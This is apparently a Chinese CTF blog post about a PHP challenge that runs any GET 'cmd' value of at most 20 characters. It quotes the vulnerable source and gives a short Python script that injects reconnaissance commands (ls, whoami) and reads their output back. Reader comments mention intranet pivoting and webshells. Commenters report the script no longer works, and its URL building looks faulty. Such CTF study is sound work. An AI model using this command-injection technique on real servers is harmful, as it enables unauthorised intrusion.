一个做不来的WEb题目
一个做不来的WEb题目
https://473831530.trains.virzz.com/
<?php error_reporting(0); /** * * Hint: CTF都没打过或者Writeups都没有观摩过,加什么群? * */ $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); mkdir($sandbox); chdir($sandbox); if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 20) { exec($_GET['cmd']); } else if (isset($_GET['reset'])) { exec('/bin/rm -rf ' . $sandbox); } highlight_file(__FILE__);
然后看到crazy 和life 老哥发了一篇文章给我。唔。
https://www.anquanke.com/post/id/87203
看到这个文章之后,贼tmd 牛皮。牛皮牛皮。
然后一直改不来py 后面life 大黑阔提醒了一下,唔。不要再这个沙盒里面去测试。而是跳到上层。唔,
改出了一个垃圾py
# -*- coding:utf8 -*- import requests as r import hashlib url = 'https://473831530.trains.virzz.com' # 查询自己的IP ip = r.get('http://ipv4.icanhazip.com/').text.strip() sandbox = url + 'sandbox/' + hashlib.md5('orange' + ip).hexdigest() + '/' reset = url + '?reset' cmd = url + '?cmd=' build2=['ls ../ >../23.txt','ls >../10.txt','whoami >../12.txt'] print build2 for i in build2: s = r.get(cmd + i) print '[%s]' % s.status_code, s.url s=r.get('https://473831530.trains.virzz.com/sandbox/23.txt') print s.text
有趣,有趣,还要内网渗透。真的这么6的么、后续发吧
13Ling
2018年8月9日 下午8:00
楼主,你的代码我用不了,提示第四行有问题,可以解疑一下吗?
print("")
2018年8月9日 下午9:34
可能题目换了吧。但是思路是一样的啊
kratos
2018年8月10日 下午2:40
https://www.anquanke.com/post/id/87203 这个网址里面用的是什么工具啊
print("")
2018年8月10日 下午2:54
那个就是手写的代码啊。没有了啊
meo9y
2018年8月27日 下午10:21
大佬,求出内网渗透。webshell会传的。
print("")
2018年8月28日 下午8:02
flag 在内网机器中的
haha
2018年8月31日 下午4:20
dalao 我内网扫了半天没思路能提示下不